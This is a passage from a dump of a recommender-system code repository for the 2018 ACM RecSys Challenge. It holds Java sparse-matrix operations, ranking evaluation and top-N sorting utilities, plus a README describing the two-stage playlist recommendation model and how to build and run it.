this.values[rowIndex];\n\t\t\tresult.addAndGet(colIndex, val * colValue);\n\t\t});\n\t\tfloat[] temp = new float[this.nCols];\n\t\tfor (int i = 0; i < temp.length; i++) {\n\t\t\ttemp[i] = (float) result.get(i);\n\t\t}\n\n\t\treturn new MLDenseVector(temp);\n\t}\n\n\t@Override\n\tpublic MLDenseVector multCol(final MLSparseVector vector) {\n\n\t\t// multiply 1 x nRows sparse vector with this matrix\n\t\tif (this.getNRows() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNRows() != vector.getLength()\");\n\t\t}\n\n\t\tAtomicDoubleArray result = new AtomicDoubleArray(this.nCols);\n\t\tint[] vectorIndexes = vector.getIndexes();\n\t\tfloat[] vectorValues = vector.getValues();\n\t\tIntStream.range(0, vectorIndexes.length).parallel()\n\t\t\t\t.forEach(rowIndex -> {\n\t\t\t\t\tint ind = vectorIndexes[rowIndex];\n\t\t\t\t\tfloat val = vectorValues[rowIndex];\n\n\t\t\t\t\tint colIndex = this.indexes[ind];\n\t\t\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\t\t\treturn;\n\t\t\t\t\t}\n\t\t\t\t\tfloat colValue = this.values[ind];\n\n\t\t\t\t\tresult.addAndGet(colIndex, val * colValue);\n\t\t\t\t});\n\n\t\tfloat[] temp = new float[this.nCols];\n\t\tfor (int i = 0; i < temp.length; i++) {\n\t\t\ttemp[i] = (float) result.get(i);\n\t\t}\n\n\t\treturn new MLDenseVector(temp);\n\t}\n\n\t@Override\n\tpublic MLDenseVector multRow(final MLDenseVector vector) {\n\n\t\t// multiply this matrix with nCols x 1 dense vector\n\t\tif (this.getNCols() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNCols() != vector.getLength()\");\n\t\t}\n\n\t\tfloat[] result = new float[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat colValue = this.values[rowIndex];\n\n\t\t\tresult[rowIndex] = vector.getValue(colIndex) * colValue;\n\t\t});\n\n\t\treturn new 
MLDenseVector(result);\n\t}\n\n\t@Override\n\tpublic MLDenseVector multRow(final MLSparseVector vector) {\n\n\t\t// multiply this matrix with nCols x 1 sparse vector\n\t\tif (this.getNCols() != vector.getLength()) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"this.getNCols() != vector.getLength()\");\n\t\t}\n\n\t\tint[] vecIndexes = vector.getIndexes();\n\t\tfloat[] vecValues = vector.getValues();\n\t\tfloat[] result = new float[this.getNRows()];\n\t\tIntStream.range(0, this.getNRows()).parallel().forEach(rowIndex -> {\n\t\t\tint colIndex = this.indexes[rowIndex];\n\t\t\tif (colIndex == MISSING_ROW) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tfloat colValue = this.values[rowIndex];\n\t\t\tint matchIndex = Arrays.binarySearch(vecIndexes, colIndex);\n\t\t\tif (matchIndex >= 0) {\n\t\t\t\tresult[rowIndex] = vecValues[matchIndex] * colValue;\n\t\t\t}\n\t\t});\n\n\t\treturn new MLDenseVector(result);\n\t}\n\n\tprivate void removeRow(final int rowIndex) {\n\t\tthis.indexes[rowIndex] = MISSING_ROW;\n\t}\n\n\t@Override\n\tpublic Map<Integer, Integer> selectCols(final int nnzCutOff) {\n\t\tMap<Integer, Integer> selectedColMap = new HashMap<Integer, Integer>(\n\t\t\t\tthis.nCols);\n\n\t\tMLDenseVector colNNZ = this.getColNNZ();\n\t\tint newIndex = 0;\n\t\tfor (int colIndex = 0; colIndex < this.nCols; colIndex++) {\n\t\t\tif (colNNZ.getValue(colIndex) > nnzCutOff) {\n\t\t\t\tselectedColMap.put(colIndex, newIndex);\n\t\t\t\tnewIndex++;\n\t\t\t}\n\t\t}\n\n\t\treturn selectedColMap;\n\t}\n\n\t@Override\n\tpublic void setNCols(final int nColsP) {\n\t\tthis.nCols = nColsP;\n\n\t}\n\n\tpublic void setRow(final int index, final float value, final int rowIndex) {\n\t\tthis.indexes[rowIndex] = index;\n\t\tthis.values[rowIndex] = value;\n\t}\n\n\t@Override\n\tpublic void setRow(final MLSparseVector row, final int rowIndex) {\n\t\tif (row == null || row.getIndexes().length == 0) {\n\t\t\tthis.removeRow(rowIndex);\n\t\t\treturn;\n\t\t}\n\n\t\tint[] rowIndexes = 
row.getIndexes();\n\t\tif (rowIndexes.length != 1) {\n\t\t\tthrow new IllegalArgumentException(\n\t\t\t\t\t\"can't add row with != 1 element\");\n\t\t}\n\t\tfloat[] rowValues = row.getValues();\n\n\t\tthis.indexes[rowIndex] = rowIndexes[0];\n\t\tthis.values[rowIndex] = rowValues[0];\n\t}\n\n\t@Override\n\tpublic void toBinFile(final String outFile) throws Exception {\n\t\tthrow new UnsupportedOperationException(\"unsupported function\");\n\t}\n\n\t@Override\n\tpublic MLSparseMatrix transpose() {\n\t\t/**\n\t\t * convert to csr\n\t\t */\n\t\tfinal int nnz = (int) this.getNNZ();\n\t\tfinal int nRows = this.getNRows();\n\t\tfinal int[] jaP = new int[nnz];\n\t\tfinal float[] aP = new float[nnz];\n\t\tfor (int i = 0, inz = 0; i < nRows; i++) {\n\t\t\tint jaPi = this.indexes[i];\n\t\t\tif (jaPi != MISSING_ROW) {\n\t\t\t\tjaP[inz] = jaPi;\n\t\t\t\taP[inz] = this.values[i];\n\t\t\t\tinz++;\n\t\t\t}\n\t\t}\n\t\t/**\n\t\t * perform transpose\n\t\t */\n\t\tfinal int nnzT = nnz;\n\t\tfinal int nRowsT = this.getNCols();\n\t\tfinal int nColsT = this.getNRows();\n\t\tfinal int[] rowIndexT = new int[nRowsT + 1];\n\t\tfinal int[] jaPT = new int[nnzT];\n\t\tfinal float[] aPT = new float[nnzT];\n\n\t\t// count nnz in each row\n\t\tfor (int i = 0; i < nnzT; i++) {\n\t\t\tint jaPi = jaP[i];\n\t\t\tif (jaPi != MISSING_ROW) {\n\t\t\t\trowIndexT[jaPi]++;\n\t\t\t}\n\t\t}\n\n\t\t// Fill starting point of the previous row to begin tally\n\t\tint r, j;\n\t\trowIndexT[nRowsT] = nnzT - rowIndexT[nRowsT - 1];\n\t\tfor (r = nRowsT - 1; r > 0; r--) {\n\t\t\trowIndexT[r] = rowIndexT[r + 1] - rowIndexT[r - 1];\n\t\t}\n\t\trowIndexT[0] = 0;\n\n\t\t// assign the new columns and values\n\t\t// synchronously tally\n\t\t// this is the place to insert extra values like dates\n\t\tfor (int c = 0, i = 0; c < nColsT; c++) {\n\t\t\t// don't need to walk through row, there's only 0/1 vals per row\n\t\t\tif (this.indexes[c] == MISSING_ROW) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tr = jaP[i];\n\t\t\tj = rowIndexT[r 
+ 1]++;\n\t\t\tjaPT[j] = c;\n\t\t\taPT[j] = aP[i];\n\t\t\ti++;\n\t\t}\n\t\t// TODO: CSR3 -> NIST and parsing can probably be more clever\n\t\tint[] pntrBT = new int[nRowsT];\n\t\tint[] pntrET = new int[nRowsT];\n\t\tint lastActivePtrE = 0;\n\t\tfor (int i = 0; i < nRowsT; i++) {\n\t\t\tif (lastActivePtrE == rowIndexT[i + 1]) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tpntrET[i] = rowIndexT[i + 1];\n\t\t\tpntrBT[i] = lastActivePtrE;\n\t\t\tlastActivePtrE = rowIndexT[i + 1];\n\t\t}\n\n\t\t/**\n\t\t * consolidate csr (NIST) back to mlsparse\n\t\t */\n\t\tfinal MLSparseVector[] rows = new MLSparseVector[nRowsT];\n\t\tIntStream.range(0, nRowsT).parallel().forEach(i -> {\n\t\t\tint rownnz = pntrET[i] - pntrBT[i];\n\t\t\tif (rownnz == 0) {\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tint[] rowColInds = new int[rownnz];\n\t\t\tfloat[] rowVals = new float[rownnz];\n\t\t\tfor (int jj = 0, k = pntrBT[i]; jj < rownnz; jj++, k++) {\n\t\t\t\trowColInds[jj] = jaPT[k];\n\t\t\t\trowVals[jj] = aPT[k];\n\t\t\t}\n\t\t\tMLSparseVector rowVec = new MLSparseVector(rowColInds, rowVals,\n\t\t\t\t\tnull, nColsT);\n\t\t\trows[i] = rowVec;\n\t\t});\n\t\treturn new MLSparseMatrixAOO(rows, nColsT);\n\t}\n}\n" }, { "alpha_fraction": 0.6904473900794983, "alphanum_fraction": 0.6942765116691589, "avg_line_length": 31.431371688842773, "blob_id": "2d523ef94c3cd1e494ec88eb958bb423efe04258", "content_id": "a84265ff3432e8de8c8fb5b6f533efa38930657e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4962, "license_type": "permissive", "max_line_length": 77, "num_lines": 153, "path": "/src/main/java/common/EvaluatorCF.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Arrays;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic abstract class EvaluatorCF {\n\n\tprotected int[] threshs;\n\n\tpublic 
EvaluatorCF(final int[] threshsP) {\n\t\tthis.threshs = threshsP;\n\t}\n\n\tpublic abstract ResultCF evaluate(final SplitterCF split,\n\t\t\tfinal String interactionType, final FloatElement[][] preds);\n\n\tpublic int[] getEvalThreshs() {\n\t\treturn this.threshs;\n\t}\n\n\tpublic int getMaxEvalThresh() {\n\t\treturn this.threshs[this.threshs.length - 1];\n\t}\n\n\tpublic static FloatElement[][] getRankings(SplitterCF split,\n\t\t\tMLDenseMatrix U, MLDenseMatrix V, final int maxThresh,\n\t\t\tfinal String interactionType) {\n\t\tif (Math.floorDiv(LowLevelRoutines.MAX_ARRAY_SIZE, V.getNRows()) >= V\n\t\t\t\t.getNCols()) {\n\t\t\treturn getRankingsNative(split.getRstrain().get(interactionType),\n\t\t\t\t\tsplit.getValidRowIndexes(), split.getValidColIndexes(), U,\n\t\t\t\t\tV, maxThresh, 100);\n\t\t} else {\n\t\t\tSystem.out.printf(\n\t\t\t\t\t\"[WARNING] using non-native ranking can be very slow\");\n\t\t\treturn getRankingsNonNative(split, U, V, maxThresh,\n\t\t\t\t\tinteractionType);\n\t\t}\n\t}\n\n\tpublic static FloatElement[][] getRankingsNative(\n\t\t\tfinal MLSparseMatrix Rtrain, final int[] rowIndexes,\n\t\t\tint[] colIndexes, final MLDenseMatrix U, final MLDenseMatrix V,\n\t\t\tfinal int rankingSize, final int rowBatchSize) {\n\n\t\t// convenience function\n\t\tfloat[] Vflat = V.slice(colIndexes).toFlatArray();\n\t\treturn getRankingsNative(Rtrain, rowIndexes, colIndexes, U, Vflat,\n\t\t\t\trankingSize, rowBatchSize);\n\t}\n\n\tpublic static FloatElement[][] getRankingsNative(\n\t\t\tfinal MLSparseMatrix Rtrain, final int[] rowIndexes,\n\t\t\tfinal int[] colIndexes, final MLDenseMatrix U, final float[] V,\n\t\t\tfinal int rankingSize, final int rowBatchSize) {\n\n\t\tFloatElement[][] rankings = new FloatElement[U.getNRows()][];\n\t\tfinal int nRowsV = colIndexes.length;\n\t\tfinal int nCols = U.getNCols();\n\n\t\tfinal Map<Integer, Integer> colMap = new HashMap<Integer, Integer>();\n\t\tfor (int i = 0; i < colIndexes.length; i++) 
{\n\t\t\tcolMap.put(colIndexes[i], i);\n\t\t}\n\n\t\tfinal int uBatchSize = Math.min(rowBatchSize,\n\t\t\t\tMath.floorDiv(LowLevelRoutines.MAX_ARRAY_SIZE, nRowsV));\n\t\tint nBatch = -Math.floorDiv(-rowIndexes.length, uBatchSize);\n\n\t\tfor (int batch = 0; batch < nBatch; batch++) {\n\t\t\tfinal int start = batch * uBatchSize;\n\t\t\tfinal int end = Math.min(start + uBatchSize, rowIndexes.length);\n\n\t\t\tfinal float[] result = new float[(end - start) * nRowsV];\n\t\t\tMLDenseMatrix uBatchRows = U.slice(rowIndexes, start, end);\n\t\t\tLowLevelRoutines.sgemm(uBatchRows.toFlatArray(), V, result,\n\t\t\t\t\t(end - start), nRowsV, nCols, true, false, 1, 0);\n\n\t\t\tIntStream.range(0, end - start).parallel().forEach(i -> {\n\t\t\t\tint rowIndex = rowIndexes[start + i];\n\t\t\t\tMLSparseVector trainRow = null;\n\t\t\t\tif (Rtrain != null) {\n\t\t\t\t\ttrainRow = Rtrain.getRow(rowIndex);\n\t\t\t\t}\n\t\t\t\t// map training index to relative index to match sliced V\n\t\t\t\tFloatElement[] preds;\n\t\t\t\tint[] excludes = null;\n\t\t\t\tif (trainRow != null) {\n\t\t\t\t\texcludes = Arrays.stream(trainRow.getIndexes())\n\t\t\t\t\t\t\t.filter(colMap::containsKey).map(colMap::get)\n\t\t\t\t\t\t\t.toArray();\n\t\t\t\t\tif (excludes.length == 0) {\n\t\t\t\t\t\texcludes = null;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tpreds = FloatElement.topNSortOffset(result, rankingSize,\n\t\t\t\t\t\texcludes, i * nRowsV, nRowsV);\n\n\t\t\t\tif (preds != null) {\n\t\t\t\t\t// map back to full index\n\t\t\t\t\tfor (int j = 0; j < preds.length; j++) {\n\t\t\t\t\t\tpreds[j].setIndex(colIndexes[preds[j].getIndex()]);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\trankings[rowIndex] = preds;\n\t\t\t});\n\t\t}\n\t\treturn rankings;\n\t}\n\n\tprivate static FloatElement[][] getRankingsNonNative(final SplitterCF split,\n\t\t\tfinal MLDenseMatrix U, final MLDenseMatrix V, final int maxThresh,\n\t\t\tfinal String interactionType) {\n\n\t\tMLSparseMatrix R_train = 
split.getRstrain().get(interactionType);\n\t\tFloatElement[][] rankings = new FloatElement[R_train.getNRows()][];\n\t\tint[] validRowIndexes = split.getValidRowIndexes();\n\t\tint[] validColIndexes = split.getValidColIndexes();\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\tMLTimer evalTimer = new MLTimer(\"ALS Eval\", validRowIndexes.length);\n\n\t\tIntStream.range(0, validRowIndexes.length).parallel().forEach(index -> {\n\t\t\tfinal int countLocal = count.incrementAndGet();\n\t\t\tif (countLocal % 1000 == 0) {\n\t\t\t\tevalTimer.tocLoop(countLocal);\n\t\t\t}\n\t\t\tint rowIndex = validRowIndexes[index];\n\n\t\t\tMLDenseVector uRow = U.getRow(rowIndex);\n\t\t\tFloatElement[] rowScores = new FloatElement[validColIndexes.length];\n\t\t\tint cur = 0;\n\t\t\tfor (int colIndex : validColIndexes) {\n\t\t\t\trowScores[cur] = new FloatElement(colIndex,\n\t\t\t\t\t\tuRow.mult(V.getRow(colIndex)));\n\t\t\t\tcur++;\n\t\t\t}\n\n\t\t\tMLSparseVector trainRow = R_train.getRow(rowIndex);\n\t\t\tif (trainRow != null) {\n\t\t\t\trankings[rowIndex] = FloatElement.topNSortArr(rowScores,\n\t\t\t\t\t\tmaxThresh, R_train.getRow(rowIndex).getIndexes());\n\t\t\t} else {\n\t\t\t\trankings[rowIndex] = FloatElement.topNSort(rowScores, maxThresh,\n\t\t\t\t\t\tnull);\n\t\t\t}\n\t\t});\n\t\treturn rankings;\n\t}\n\n}\n" }, { "alpha_fraction": 0.6742296814918518, "alphanum_fraction": 0.6805322170257568, "avg_line_length": 24.140844345092773, "blob_id": "80784f22c38b6ca2d81120758ba3094f72d9c84b", "content_id": "a7e845050bfa61df15c03ec5781a746e0a374e30", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7140, "license_type": "permissive", "max_line_length": 82, "num_lines": 284, "path": "/src/main/java/common/FloatElement.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.io.Serializable;\nimport java.util.Arrays;\nimport java.util.Comparator;\nimport 
java.util.HashSet;\nimport java.util.PriorityQueue;\nimport java.util.Set;\nimport java.util.stream.IntStream;\n\npublic class FloatElement implements Serializable {\n\n\tpublic static class IndexComparator implements Comparator<FloatElement> {\n\n\t\tprivate boolean decreasing;\n\n\t\tpublic IndexComparator(final boolean decreasingP) {\n\t\t\tthis.decreasing = decreasingP;\n\t\t}\n\n\t\t@Override\n\t\tpublic int compare(final FloatElement e1, final FloatElement e2) {\n\t\t\tif (this.decreasing == true) {\n\t\t\t\treturn Integer.compare(e2.index, e1.index);\n\t\t\t} else {\n\t\t\t\treturn Integer.compare(e1.index, e2.index);\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static class ValueComparator implements Comparator<FloatElement> {\n\n\t\tprivate boolean decreasing;\n\n\t\tpublic ValueComparator(final boolean decreasingP) {\n\t\t\tthis.decreasing = decreasingP;\n\t\t}\n\n\t\t@Override\n\t\tpublic int compare(final FloatElement e1, final FloatElement e2) {\n\t\t\tif (this.decreasing == true) {\n\t\t\t\treturn Float.compare(e2.value, e1.value);\n\t\t\t} else {\n\t\t\t\treturn Float.compare(e1.value, e2.value);\n\t\t\t}\n\t\t}\n\t}\n\n\tprivate static final long serialVersionUID = -4838379190571020403L;\n\tprivate int index;\n\tprivate float value;\n\tprivate Object other;\n\n\tpublic FloatElement(final int indexP, final float valueP) {\n\t\tthis.index = indexP;\n\t\tthis.value = valueP;\n\t}\n\n\tpublic FloatElement(final int indexP, final float valueP,\n\t\t\tfinal Object otherP) {\n\t\tthis.index = indexP;\n\t\tthis.value = valueP;\n\t\tthis.other = otherP;\n\t}\n\n\tpublic int getIndex() {\n\t\treturn this.index;\n\t}\n\n\tpublic Object getOther() {\n\t\treturn this.other;\n\t}\n\n\tpublic float getValue() {\n\t\treturn this.value;\n\t}\n\n\tpublic void setIndex(final int indexP) {\n\t\tthis.index = indexP;\n\t}\n\n\tpublic void setOther(final Object otherP) {\n\t\tthis.other = otherP;\n\t}\n\n\tpublic void setValue(final float valueP) {\n\t\tthis.value = 
valueP;\n\t}\n\n\tpublic static void standardize(final FloatElement[][] scores) {\n\t\t// in place row-based score standarization\n\t\tIntStream.range(0, scores.length).parallel().forEach(i -> {\n\t\t\tFloatElement[] row = scores[i];\n\t\t\tif (row == null) {\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tstandardize(row);\n\t\t});\n\t}\n\n\tpublic static void standardize(final FloatElement[] scores) {\n\t\tfloat mean = 0f;\n\t\tfor (FloatElement element : scores) {\n\t\t\tmean += element.value;\n\t\t}\n\t\tmean = mean / scores.length;\n\n\t\tfloat std = 0f;\n\t\tfor (FloatElement element : scores) {\n\t\t\tstd += (element.value - mean) * (element.value - mean);\n\t\t}\n\t\tstd = (float) Math.sqrt(std / scores.length);\n\n\t\tif (std > 1e-5) {\n\t\t\tfor (FloatElement element : scores) {\n\t\t\t\telement.value = (element.value - mean) / std;\n\t\t\t}\n\t\t}\n\t}\n\n\tpublic static FloatElement[] topNSort(final float[] vec, final int topN,\n\t\t\tfinal int[] exclusions) {\n\t\tSet<Integer> exclusionSet = new HashSet<Integer>(exclusions.length);\n\t\tfor (int exclusion : exclusions) {\n\t\t\texclusionSet.add(exclusion);\n\t\t}\n\t\treturn topNSort(vec, topN, exclusionSet);\n\t}\n\n\tpublic static FloatElement[] topNSort(final float[] vec, final int topN,\n\t\t\tfinal Set<Integer> exclusions) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<FloatElement>(topN,\n\t\t\t\tvalAscending);\n\n\t\tfor (int i = 0; i < vec.length; i++) {\n\t\t\tif (exclusions != null && exclusions.contains(i) == true) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tfloat val = vec[i];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(new FloatElement(i, val));\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().value < val) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(new FloatElement(i, 
val));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n\tpublic static FloatElement[] topNSort(final FloatElement[] vec,\n\t\t\tfinal int topN, final Set<Integer> exclusions) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<FloatElement>(topN,\n\t\t\t\tvalAscending);\n\n\t\tfor (int i = 0; i < vec.length; i++) {\n\t\t\tif (exclusions != null && exclusions.contains(i) == true) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tFloatElement element = vec[i];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(element);\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().value < element.getValue()) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(element);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n\tpublic static FloatElement[] topNSortArr(final FloatElement[] vec,\n\t\t\tfinal int topN, final int[] exclusions) {\n\t\tSet<Integer> exclusionSet = new HashSet<Integer>(exclusions.length);\n\t\tfor (int exclusion : exclusions) {\n\t\t\texclusionSet.add(exclusion);\n\t\t}\n\t\treturn topNSort(vec, topN, exclusionSet);\n\t}\n\n\tpublic static FloatElement[] topNSortOffset(final float[] vec, int topN,\n\t\t\tfinal int offset, final int length, Set<Integer> exclusions) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<>(topN,\n\t\t\t\tvalAscending);\n\n\t\tfor (int i = 0; i 
< length; i++) {\n\t\t\tif (exclusions != null && exclusions.contains(i) == true) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tfloat val = vec[i + offset];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(new FloatElement(i, val));\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().getValue() < val) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(new FloatElement(i, val));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n\tpublic static FloatElement[] topNSortOffset(final float[] vec, int topN,\n\t\t\tint[] exclusionSorted, final int offset, final int length) {\n\n\t\tfinal Comparator<FloatElement> valAscending = new FloatElement.ValueComparator(\n\t\t\t\tfalse);\n\t\tfinal Comparator<FloatElement> valDescending = new FloatElement.ValueComparator(\n\t\t\t\ttrue);\n\t\tPriorityQueue<FloatElement> heap = new PriorityQueue<>(topN,\n\t\t\t\tvalAscending);\n\n\t\tint skipping = exclusionSorted == null ? -1 : exclusionSorted[0];\n\t\tint skippingCur = 0;\n\t\tfinal int exclusionEnd = exclusionSorted == null ? 
0\n\t\t\t\t: exclusionSorted.length;\n\t\tfor (int i = 0; i < length; i++) {\n\t\t\tif (i == skipping) {\n\t\t\t\tskippingCur++;\n\t\t\t\tif (skippingCur < exclusionEnd) {\n\t\t\t\t\tskipping = exclusionSorted[skippingCur];\n\t\t\t\t} else {\n\t\t\t\t\tskipping = -1;\n\t\t\t\t}\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tfloat val = vec[i + offset];\n\t\t\tif (heap.size() < topN) {\n\t\t\t\theap.add(new FloatElement(i, val));\n\n\t\t\t} else {\n\t\t\t\tif (heap.peek().getValue() < val) {\n\t\t\t\t\theap.poll();\n\t\t\t\t\theap.add(new FloatElement(i, val));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tFloatElement[] heapArray = new FloatElement[heap.size()];\n\t\theap.toArray(heapArray);\n\t\tArrays.sort(heapArray, valDescending);\n\n\t\treturn heapArray;\n\t}\n\n}\n" }, { "alpha_fraction": 0.7252691984176636, "alphanum_fraction": 0.7598296999931335, "avg_line_length": 51.52631759643555, "blob_id": "57aeb01ee432b7718907c5cee7a3b881140ddde1", "content_id": "00aebb8307bb6e41823775746faed17d9d364602", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3993, "license_type": "permissive", "max_line_length": 476, "num_lines": 76, "path": "/README.md", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n<a href=\"https://layer6.ai/\"><img src=\"https://github.com/layer6ai-labs/DropoutNet/blob/master/logs/logobox.jpg\" width=\"120\" height=\"70\"></a>\n<a href=\"https://www.utoronto.ca//\"><img src=\"https://github.com/layer6ai-labs/vl6_recsys2018/blob/master/logos/UofT.jpg\" width=\"120\" height=\"70\"></a>\n<a href=\"https://vectorinstitute.ai/\"><img src=\"https://github.com/layer6ai-labs/vl6_recsys2018/blob/master/logos/vector.jpg\" width=\"120\" height=\"70\"></a>\n</p>\n\n## 2018 ACM RecSys Challenge 1'st Place Solution From Team vl6 \n\n**Team members**: Maksims Volkovs (Layer 6), Himanshu Rai (Layer 6), Zhaoyue Cheng (Layer 6), Yichao Lu (University of Toronto), Ga Wu 
(University of Toronto, Vector Institute), Scott Sanner (University of Toronto, Vector Institute) \n[[paper](http://www.cs.toronto.edu/~mvolkovs/recsys2018_challenge.pdf)][[challenge](http://www.recsyschallenge.com/2018)]\n\nContact: [email protected]\n\n<a name=\"intro\"/>\n\n## Introduction\nThis repository contains the Java implementation of our entries for both main and creative tracks. Our approach \nconsists of a two-stage model where in the first stage a blend of collaborative filtering methods is used to \nquickly retrieve a set of candidate songs for each playlist with high recall. Then in the second stage a pairwise \nplaylist-song gradient boosting model is used to re-rank the retrieved candidates and maximize precision at the \ntop of the recommended list.\n\n<a name=\"env\"/>\n\n## Environment\nThe model is implemented in Java and tested on the following environment:\n* Intel(R) Xeon(R) CPU E5-2620 v4 @ 2.10GHz\n* 256GB RAM\n* Nvidia Titan V\n* Java Oracle 1.8.0_171\n* Python, Numpy 1.14.3, Sklearn 0.19.1, Scipy 1.1.0\n* Apache Maven 3.3.9\n* CUDA 8.0 and CUDNN 8.0\n* Intel MKL 2018.1.038\n* XGBoost and XGBoost4j 0.7\n\n<a name=\"dataset\"/>\n\n## Executing\n\nAll models are executed from `src/main/java/main/Executor.java`, the main function has examples on \nhow to do main and creative track model training, evaluation and submission. 
To run the model:\n\n* Set all paths:\n```\n//OAuth token for spotify creative api, if doing creative track submission\nString authToken = \"\";\n\n// path to song audio feature file, if doing creative track submission\nString creativeTrackFile = \"/home/recsys2018/data/song_audio_features.txt\";\n\n// path to MPD directory with the JSON files\nString trainPath = \"/home/recsys2018/data/train/\";\n\n// path to challenge set JSON file\nString testFile = \"/home/recsys2018/data/test/challenge_set.json\";\n\n// path to python SVD script included in the repo, default location: script/svd_py.py\nString pythonScriptPath = \"/home/recsys2018/script/svd_py.py\";\n\n//path to cache folder for temp storage, at least 20GB should be available in this folder\nString cachePath = \"/home/recsys2018/cache/\";\n```\n\n* Compile and execute with maven:\n```\nexport MAVEN_OPTS=\"-Xms150g -Xmx150g\"\nmvn clean compile\nmvn exec:java -Dexec.mainClass=\"main.Executor\" \n```\nNote that by default the code is executing model for the main track, to run the creative track model set `xgbParams.doCreative = true`. For the creative track we extracted extra song features from the \n[Spotify Audio API](https://developer.spotify.com/documentation/web-api/reference/tracks/get-several-audio-features/). We were able to match most songs from the challenge Million Playlist Dataset, and used the following fields for further feature extraction: `[acousticness, danceability, energy, instrumentalness, key, liveness, loudness, mode, speechiness, tempo, time_signature, valence]`. 
In order to download the data for this track, you need to get the OAuth Token from \n[Spotify API page](https://developer.spotify.com/console/get-audio-features-several-tracks/?ids=4JpKVNYnVcJ8tuMKjAj50A,2NRANZE9UCmPAS5XVbXL40,24JygzOLM0EmRQeGtFcIcG) and\nassign it to the `authToken` variable in the `Executor.main` function.\n\nWe prioritized speed over memory for this project so you'll need at least 100GB of RAM to run model training and inference. The full end-to-end runtime takes approximately 1.5 days.\n\n" }, { "alpha_fraction": 0.6224581003189087, "alphanum_fraction": 0.631683349609375, "avg_line_length": 28.825443267822266, "blob_id": "9e84ece419fc039fb163367f0fe751a4840a0e60", "content_id": "388d4b0551a60e036773446210985b68fcc52d75", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 10081, "license_type": "permissive", "max_line_length": 73, "num_lines": 338, "path": "/src/main/java/common/ALS.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.lang.reflect.Field;\nimport java.util.Arrays;\nimport java.util.Random;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.stream.IntStream;\n\npublic class ALS {\n\n\tpublic static class ALSParams {\n\t\tpublic int maxIter = 10;\n\t\tpublic int rank = 200;\n\t\tpublic float alpha = 10f;\n\t\tpublic float lambda = 0.01f;\n\t\tpublic float init = 0.01f;\n\t\tpublic int seed = 1;\n\t\tpublic boolean evaluate = true;\n\t\tpublic boolean debug = 